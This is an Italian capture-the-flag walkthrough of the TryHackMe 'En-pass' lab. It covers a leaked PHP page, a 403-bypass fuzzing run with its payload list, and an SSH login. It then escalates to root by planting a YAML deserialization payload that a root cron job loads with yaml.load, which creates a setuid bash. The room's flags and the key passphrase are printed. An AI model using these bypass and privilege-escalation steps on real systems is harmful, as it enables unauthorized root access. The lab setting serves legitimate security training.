Descrizione:
Get what you can't.
Link: https://tryhackme.com/room/enpass

⠀
⠀
Suggerimento: The path you get will forbid to see but you can bypass it.
La pagina /reg.php:
┌──(user㉿parrot)-[/data/En-pass/files]
└─$ curl -s http://10.10.67.150:8001/reg.php | tr -s '\n' 1 ⨯
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>En-Pass</title>
[REDACTED]
</head>
<body>
<img src="sau.jpg" alt="sau">
<h1>EN-PASS</h1>
<div id="container">
<form method="POST" action="/reg.php">
<input type="text" id="title" name="title" placeholder="Input">
<input type="submit" value="Submit">
<h4 style='color:rgb(83, 21, 165);'> <?php
if($_SERVER["REQUEST_METHOD"] == "POST"){
$title = $_POST["title"];
if (!preg_match('/[a-zA-Z0-9]/i' , $title )){
$val = explode(",",$title);
$sum = 0;
for($i = 0 ; $i < 9; $i++){
if ( (strlen($val[0]) == 2) and (strlen($val[8]) == 3 )) {
if ( $val[5] !=$val[8] and $val[3]!=$val[7] )
$sum = $sum+ (bool)$val[$i]."<br>";
}
}
if ( ($sum) == 9 ){
echo $result;//do not worry you'll get what you need.
echo " Congo You Got It !! Nice ";
}
else{
echo " Try Try!!";
}
}
else{
echo " Try Again!! ";
}
}
?>
</h4>
</form>
</div>
</body>
</html>
A questo punto, abbiamo la password per la chiave privata SSH, ma non funziona.
Ci resta solo la pagina 403.php:
Proviamo con Burp Suite:
┌──(user㉿parrot)-[/data/src/403fuzzer]
└─$ python3 403fuzzer.py -u http://10.10.67.150:8001/403.php -hc 403,404 --proxy http://localhost:8080
Sending header payloads...
Proxy flag was detected. Skipping trailing dot payload...
Sending URL payloads...
Response Code: 200 Length: 2563 Payload: /#403.php
Response Code: 200 Length: 2563 Payload: /#?403.php
Response Code: 400 Length: 306 Payload: /%2e%2e/403.php
Response Code: 200 Length: 2563 Payload: /#403.php
Response Code: 400 Length: 306 Payload: /%2e%2e/403.php
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /403.php%3b/%2e.
Response Code: 200 Length: 2563 Payload: /403.php%3b/..
Response Code: 200 Length: 2563 Payload: /403.php/%2e%2e
Response Code: 200 Length: 2563 Payload: /403.php/%2e%2e/
Response Code: 200 Length: 2563 Payload: /403.php/..
Response Code: 200 Length: 2563 Payload: /403.php/../
Response Code: 200 Length: 2563 Payload: /403.php/../../
Response Code: 200 Length: 2563 Payload: /403.php/../../../
Response Code: 200 Length: 2563 Payload: /403.php/../../..//
Response Code: 200 Length: 2563 Payload: /403.php/../..//
Response Code: 200 Length: 2563 Payload: /403.php/../..//../
Response Code: 200 Length: 2563 Payload: /403.php/.././../
Response Code: 200 Length: 2563 Payload: /403.php/../.;/../
Response Code: 200 Length: 2563 Payload: /403.php/..//
Response Code: 200 Length: 2563 Payload: /403.php/..//../
Response Code: 200 Length: 2563 Payload: /403.php/..//../../
Response Code: 200 Length: 2563 Payload: /403.php/../;/../
Response Code: 200 Length: 917 Payload: /403.php/..;/ <------------------ interesting
Response Code: 200 Length: 917 Payload: /403.php/..;//../
Response Code: 200 Length: 2563 Payload: /403.php//../../
Response Code: 200 Length: 2563 Payload: /403.php;%2f%2f/../
Response Code: 200 Length: 2563 Payload: /403.php;%2f..%2f/../
Response Code: 200 Length: 2563 Payload: /403.php;/%2e%2e
Response Code: 200 Length: 2563 Payload: /403.php;/%2e%2e/
Response Code: 200 Length: 2563 Payload: /403.php;/%2e.
Response Code: 200 Length: 2563 Payload: /403.php;/.%2e
Response Code: 200 Length: 2563 Payload: /403.php;/..
Response Code: 200 Length: 2563 Payload: /403.php;/../
Response Code: 200 Length: 2563 Payload: /403.php;/../../
Response Code: 200 Length: 2563 Payload: /403.php;/../..//
Response Code: 200 Length: 2563 Payload: /403.php;/.././../
Response Code: 200 Length: 2563 Payload: /403.php;/../.;/../
Response Code: 200 Length: 2563 Payload: /403.php;/..//
Response Code: 400 Length: 306 Payload: /403.php;/..//%2e%2e/
Response Code: 200 Length: 2563 Payload: /403.php;/..//../
Response Code: 200 Length: 2563 Payload: /403.php;/..///
Response Code: 200 Length: 2563 Payload: /403.php;/../;/../
Response Code: 200 Length: 2563 Payload: /403.php;/..
Response Code: 200 Length: 2563 Payload: /403.php;//../../
Response Code: 400 Length: 306 Payload: /;/..//%2e%2e/403.php
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /#403.php
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /
Response Code: 200 Length: 2563 Payload: /
Response code: 200 Response length: 0 Sent OPTIONS method.
Response length was 0 so probably NOT worth checking out....
Response Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 0
Le richieste con un codice HTTP 200:
GET /403.php/..;/ HTTP/1.1
Host: 10.10.67.150:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Dove abbiamo:
HTTP/1.1 200 OK
Date: Wed, 12 May 2021 17:07:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 917
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>En-Pass</title>
[REDACTED]
<h3>Glad to see you here.Congo, you bypassed it. 'imsau' is waiting for you somewhere.</h3>
</body>
</html>
Ora abbiamo username e password per accedere:
┌──(user㉿parrot)-[/data/En-pass/files]
└─$ ssh -i key imsau@10.10.67.150
Enter passphrase for key 'key': cimihan_are_you_here?
$ cat user.txt
1c5ccb6ce6f3561e302e0e516c633da9
USER FLAG: 1c5ccb6ce6f3561e302e0e516c633da9
⠀
⠀
L'esecuzione di pspy64 rivelerà un cronjob eseguito da root ogni minuto:
2021/05/12 19:02:01 CMD: UID=0 PID=22837 | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml
2021/05/12 19:02:01 CMD: UID=0 PID=22836 | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml
2021/05/12 19:02:01 CMD: UID=0 PID=22835 | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml
2021/05/12 19:02:01 CMD: UID=0 PID=22834 | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml
2021/05/12 19:02:01 CMD: UID=0 PID=22833 | /usr/sbin/CRON -f
2021/05/12 19:02:01 CMD: UID=0 PID=22832 | /usr/sbin/CRON -f
2021/05/12 19:02:01 CMD: UID=0 PID=22838 | sudo chown root:root /tmp/file.yml
2021/05/12 19:02:01 CMD: UID=0 PID=22839 | sudo /usr/bin/python /opt/scripts/file.py
2021/05/12 19:02:05 CMD: UID=0 PID=22840 | ps -e -o pid,ppid,state,command
2021/05/12 19:03:01 CMD: UID=0 PID=22846 | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml
2021/05/12 19:03:01 CMD: UID=0 PID=22845 | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml
2021/05/12 19:03:01 CMD: UID=0 PID=22844 | /bin/sh -c cd /opt/scripts && sudo /usr/bin/python /opt/scripts/file.py && sudo rm -f /tmp/file.yml
2021/05/12 19:03:01 CMD: UID=0 PID=22843 | /bin/sh -c cd /tmp && sudo chown root:root /tmp/file.yml
2021/05/12 19:03:01 CMD: UID=0 PID=22842 | /usr/sbin/CRON -f
2021/05/12 19:03:01 CMD: UID=0 PID=22841 | /usr/sbin/CRON -f
2021/05/12 19:03:01 CMD: UID=0 PID=22847 | sudo chown root:root /tmp/file.yml
2021/05/12 19:03:01 CMD: UID=0 PID=22848 | sudo /usr/bin/python /opt/scripts/file.py
2021/05/12 19:03:07 CMD: UID=0 PID=22849 | ps -e -o pid,ppid,state,command
Il cron job esegue il seguente script Python con sudo e rimuove il file /tmp/file.yml:
imsau@enpass:/opt/scripts$ cat file.py
#!/usr/bin/python
import yaml
class Execute():
def __init__(self,file_name ="/tmp/file.yml"):
self.file_name = file_name
self.read_file = open(file_name ,"r")
def run(self):
return self.read_file.read()
data = yaml.load(Execute().run())
Non abbiamo accesso in scrittura allo script, ma la ricerca di exploit che interessano la libreria yaml importata porterà a questo problema.
$ cp `which bash` /tmp/bash
$ cat > /tmp/file.yml << EOF
!!python/object/new:os.system ["chown root /tmp/bash;chmod u+s /tmp/bash"]
EOF
Dopo un minuto, abbiamo una shell di root:
imsau@enpass:/tmp$ ./bash -p
bash-4.3# cat /root/root.txt
5d45f08ee939521d59247233d3f8faf
ROOT FLAG: 5d45f08ee939521d59247233d3f8faf
RIASSUMENDO:
